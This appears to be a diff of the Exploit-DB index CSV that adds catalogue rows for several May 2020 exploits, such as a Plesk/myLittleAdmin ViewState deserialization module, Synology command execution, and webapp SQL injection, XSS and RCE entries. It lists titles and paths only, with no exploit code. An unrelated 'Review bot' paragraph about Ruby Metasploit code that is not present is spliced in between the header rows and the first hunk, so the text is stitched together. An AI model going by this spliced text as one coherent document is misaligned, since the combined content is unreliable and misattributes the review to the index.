 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
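Review bot: The comment lines immediately above `VIEWSTATE_GENERATOR` and `VIEWSTATE_VALIDATION_KEY` are empty as rendered here, so nothing records where either constant comes from; a comment such as `# Static values taken from the web.config that ships with myLittleAdmin (see Description)` documents that dependency, and if the original comment was an XML element it was probably dropped by extraction. `execute_command` passes `@viewstate_generator` as `extra:`, but that variable is only assigned inside `check_viewstate`, so when the automatic check does not run the request goes out with `extra: nil`; at minimum state this in a comment on `execute_command`, `# @viewstate_generator is populated by check_viewstate (via the AutoCheck super in exploit)`. The success test `res.redirection.path == '/error/index.html'` encodes observed server behaviour rather than a documented contract, and a one-line comment saying why a 302 to that path is treated as success would help the next maintainer.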
@@ -18157,6 +18158,8 @@ id,file,description,date,author,type,platform,port
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
+48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows,
+48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42736,3 +42739,6 @@ id,file,description,date,author,type,platform,port
 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
 48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,
+48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,
+48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php,
+48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,